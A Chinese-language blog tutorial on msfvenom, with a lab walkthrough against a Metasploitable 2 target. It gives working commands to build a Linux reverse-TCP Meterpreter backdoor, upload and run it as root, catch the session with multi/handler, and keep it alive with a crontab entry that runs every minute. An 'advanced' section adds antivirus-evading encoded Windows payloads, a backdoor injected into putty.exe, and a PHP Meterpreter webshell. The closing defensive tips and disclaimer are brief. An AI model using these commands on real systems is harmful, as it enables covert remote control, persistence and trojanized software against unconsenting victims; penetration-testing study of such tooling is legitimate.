当前位置: 首页 > news >正文

Msfvenom深度解析:从MSF分离出的后门生成器,Linux计划任务持久化实战

摘要:Msfvenom是Metasploit框架中独立的载荷生成工具,可创建木马后门。本文将详细讲解Msfvenom的前世今生(从MSF中的msfpayload+msfencode合并而来)、核心特点(支持多平台、多格式、编码免杀等),并实战演示生成Linux反向Shell后门,上传至靶机执行,利用multi/handler建立Meterpreter会话。更进一步,使用crontab计划任务实现后门自动重启(持久化)。内容涵盖后门生成、文件传输、权限设置、监听连接、计划任务配置以及多会话管理。


一、实验环境

设备操作系统IP地址
攻击机Kali Linux 2026.110.0.0.129
靶机Metasploitable 2 (Linux)10.0.0.243

二、Msfvenom工具详解

2.1 前世今生

Msfvenom的前身是Metasploit框架中的两个独立工具:

  • msfpayload:用于生成payload(漏洞载荷)的原始二进制文件或代码。

  • msfencode:用于对payload进行编码,以绕过杀软检测。

在Metasploit 4.0版本之后,开发团队将两者合并为msfvenom,统一了命令行接口,简化了操作。现在msfvenom是Kali Linux内置的核心工具之一,与msfconsole配合使用。

2.2 核心特点
特性说明
多平台支持可生成Windows、Linux、macOS、Android、iOS等平台的payload
多格式输出elf,exe,python,c,raw,ps1,vba等数十种格式
载荷丰富支持meterpreter,shell,bind,reverse_tcp,reverse_https,web_delivery
编码免杀内置shikata_ga_nai等多态编码器,可多次编码绕过AV
嵌入模板可注入到合法可执行文件(如putty.exe)中
与MSF无缝集成生成的payload可直接被multi/handler监听
2.3 常用参数
msfvenom -l payloads # 列出所有可用载荷 msfvenom -l encoders # 列出所有编码器 msfvenom -l formats # 列出所有输出格式

常用参数:

  • -p:指定payload(如linux/x86/meterpreter/reverse_tcp

  • -f:输出格式(elf,exe,python等)

  • LHOST:攻击机监听IP(反向连接目标地址)

  • LPORT:攻击机监听端口

  • -e:指定编码器(如x86/shikata_ga_nai

  • -i:编码次数(如-i 5

  • -o:输出文件名

  • -a:指定架构(x86,x64

  • -platform:指定平台(windows,linux


三、实战:生成并部署Linux后门

步骤1:在Kali中生成后门文件
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.129 LPORT=4444 -f elf -o shell

生成的文件名为shell,类型为ELF可执行文件。

步骤2:将后门上传至靶机

先通过破解的靶机用户和密码登录靶机,设置root密码

然后使用SCP上传:

scp -o HostKeyAlgorithms=+ssh-rsa shell root@10.0.0.243:/mnt/ #添加-o HostKeyAlgorithms=+ssh-rsa这个是因为靶机密钥算法太旧,所以kali默认禁用了,临时使用添加这个即可

输入靶机root密码。

步骤3:在靶机中赋予执行权限并后台运行

通过SSH登录靶机(例如使用msfadmin账户):

ssh msfadmin@10.0.0.243 sudo -i # 切换root,密码刚设置的 chmod +x /mnt/shell /mnt/shell & # 后台运行

步骤4:在Kali中启动MSF监听
msfconsole -q msf > use exploit/multi/handler # 使用通用监听模块,等待目标反向连接 msf > set payload linux/x86/meterpreter/reverse_tcp # 设置反向TCP的Meterpreter载荷(针对32位Linux) msf > set LHOST 10.0.0.129 # 设置攻击机本地IP地址,用于接收连接 msf > set LPORT 4444 # 设置攻击机本地监听端口 msf > run # 启动监听器,等待目标执行载荷后建立会话

稍等片刻,会话建立:

步骤5:验证后门功能
meterpreter > getuid meterpreter > sysinfo


四、持久化:创建计划任务自动重启后门

如果靶机重启,后门进程会消失。利用Linuxcrontab每分钟检查并运行后门。

步骤1:编辑计划任务

在靶机(root)中执行:

EDITOR=vim crontab -e

添加以下行:

* * * * * /mnt/shell

保存退出。

步骤2:验证计划任务

查看当前任务:

crontab -l

测试是否每分钟执行:可添加一个额外任务测试时间戳:

* * * * * /bin/date >> /mnt/time.txt

然后等待1分钟,检查/mnt/time.txt是否有时间更新。

步骤3:重启靶机,验证自动重连

重启靶机:

reboot

在Kali中再次运行multi/handler监听,等待约1-2分钟后,应再次收到Meterpreter会话(因为cron每分钟执行一次后门)。

步骤4:多会话管理

当有多个会话时,可以查看所有会话:

meterpreter > background msf > sessions

切换会话:

msf > sessions -i <ID>

五、Msfvenom高级技巧(选读)

编码免杀

# 生成一个 Windows 平台的 Meterpreter 反向 TCP 后门,并使用编码器尝试绕过杀毒软件 msfvenom -p windows/meterpreter/reverse_tcp \ # -p: 指定使用的 payload(攻击载荷) LHOST=x.x.x.x \ # 设置攻击机的 IP 地址(反向连接的目标) LPORT=4444 \ # 设置攻击机的监听端口 -e x86/shikata_ga_nai \ # -e: 使用编码器(shikata_ga_nai 是多态编码器) -i 5 \ # -i: 编码次数(这里重复编码 5 次,增加免杀效果) -f exe \ # -f: 指定输出文件格式(Windows 可执行文件) -o payload.exe # -o: 输出文件名

嵌入模板

# 将后门程序绑定到一个正常的 putty.exe 程序上,运行 putty 时会同时执行后门 msfvenom -p windows/meterpreter/reverse_tcp \ # 同样使用反向 Meterpreter 载荷 LHOST=x.x.x.x \ # 攻击机 IP LPORT=4444 \ # 攻击机端口 -x /path/to/putty.exe \ # -x: 指定模板文件(将后门注入该文件) -f exe \ # 输出 exe 格式 -o putty_backdoor.exe # 生成的木马文件名

生成Web Shell

# 生成一个 PHP 格式的 Webshell,用于上传到 Web 服务器,通过浏览器访问触发反向连接 msfvenom -p php/meterpreter/reverse_tcp \ # PHP 平台的反向 Meterpreter 载荷 LHOST=x.x.x.x \ # 攻击机 IP LPORT=4444 \ # 攻击机端口 -f raw \ # -f raw: 输出原始代码(不添加额外包装) -o shell.php # 保存为 .php 文件,可直接部署在 Web 目录

六、总结

本文首先系统介绍了Msfvenom工具的历史演变(由msfpayload与msfencode合并而来)、核心特点(跨平台、多格式、编码免杀、无缝集成MSF)及常用参数。随后,在Kali Linux攻击机与Metasploitable 2靶机环境中,实战演示了使用Msfvenom生成Linux反向TCP Meterpreter后门,通过SCP上传并执行,配合Metasploit的multi/handler模块成功建立控制会话。为实现持久化,利用Linux crontab机制将后门设置为每分钟自动运行,验证了即使靶机重启后门仍能重新上线。实验展示了红队常用的持久化技术。防御此类攻击的措施包括:定期审计计划任务(crontab -l)、监控异常进程、限制/tmp/mnt等目录的可执行权限、使用完整性监控工具(如AIDE)、以及限制非必要的文件上传功能。Msfvenom作为渗透测试的核心工具,其灵活性和强大功能值得安全从业者深入掌握。


重要声明:本教程及文中所有操作仅限于合法授权的安全学习与研究。作者及发布平台不承担因不当使用本教程所引发的任何直接或间接法律责任。请务必遵守中华人民共和国网络安全相关法律法规。

如果这篇文章帮你解决了实操上的困惑,别忘记点击点赞、分享,也可以留言告诉我你遇到的其它问题,我会尽快回复。你的关注是我坚持原创和细节共享的力量来源,谢谢大家。

http://www.jsqmd.com/news/799928/

相关文章:

  • 哔咔漫画下载器完整指南:告别网络卡顿,打造个人离线漫画图书馆
  • FPGA实现UART与电力线通信的高效桥接方案
  • 终极Blender 3MF插件:如何快速实现3D打印文件的无缝转换
  • 基于MCP协议构建垂直领域AI知识服务:猴头菇茶MCP服务器实战
  • 雾计算在物联网中的架构革新与实践
  • 告别手动画图!用Ultra Librarian+OrCAD Capture CIS 5分钟搞定Cadence原理图库
  • GPU需求曲线重塑:从季节性疲软到持续高烧的产业变革
  • Windows光标定制工具开发:从Win32 API到Delphi桌面应用实践
  • 3步快速上手RobotHelper:安卓自动化脚本框架新手指南
  • ENVI 5.3保姆级教程:手把手搞定Landsat 7影像从辐射定标到FLAASH大气校正的全流程
  • AI相册搜索效率提升300%?Gemini驱动的Google Photos智能检索全解析,含实测对比数据与隐私边界警告
  • 深度解析VinXiangQi:基于深度学习的中国象棋AI连线工具终极指南
  • ltx2.3 最强开源视频生成模型,支持图生视频、文生视频、消费级显卡可本地部署,一键整合包
  • ViGEmBus终极指南:3步掌握Windows游戏手柄模拟核心技术
  • 大型机场U型机坪推出等待点运行优化【附案例】
  • NotebookLM Drive整合失效诊断图谱(含HTTP 403/401错误码映射表、OAuth2作用域校验清单)
  • Sora 2生成素材在AE中频繁掉帧?20年合成老炮儿用CUDA Graph重构图层管线,性能提升3.8倍(含Profile对比图)
  • Pretticlaw:AI应用开发的工作流编排与生产部署平台
  • iPhone 17 护眼膜选购避坑:为什么说圆偏振光才是真护眼?
  • Axolotl与LLaMA-Factory对比:架构与扩展性分析-方案选型对比
  • 硅应变计与Σ-Δ ADC协同设计及温度补偿技术
  • Harness 中的动态熔断阈值调整
  • 清华研究发现:当世界模型能够通过视觉想象而非纯文本思考时,其推理方式更接近人类!
  • 谁懂啊[特殊字符]UniApp上架苹果4.3a被拒?改UI?纯纯大冤种行为!
  • 基于Gemini CLI Blueprint框架构建AI命令行工具:从原理到实践
  • AI发展速度惊人,普通人如何抓住时代红利?内含低门槛入局指南!
  • Discord集成Claude智能体:极简Docker容器化部署与安全实践
  • 使用remote2mac实现Windows远程开发macOS:VSCode SSH配置与优化指南
  • Win10/Win11下华硕笔记本Wi-Fi 6 AX201代码10的‘节能模式’陷阱与排查清单
  • 惠普开发了一架3D打印无人机,超轻、超快组装、成功试飞!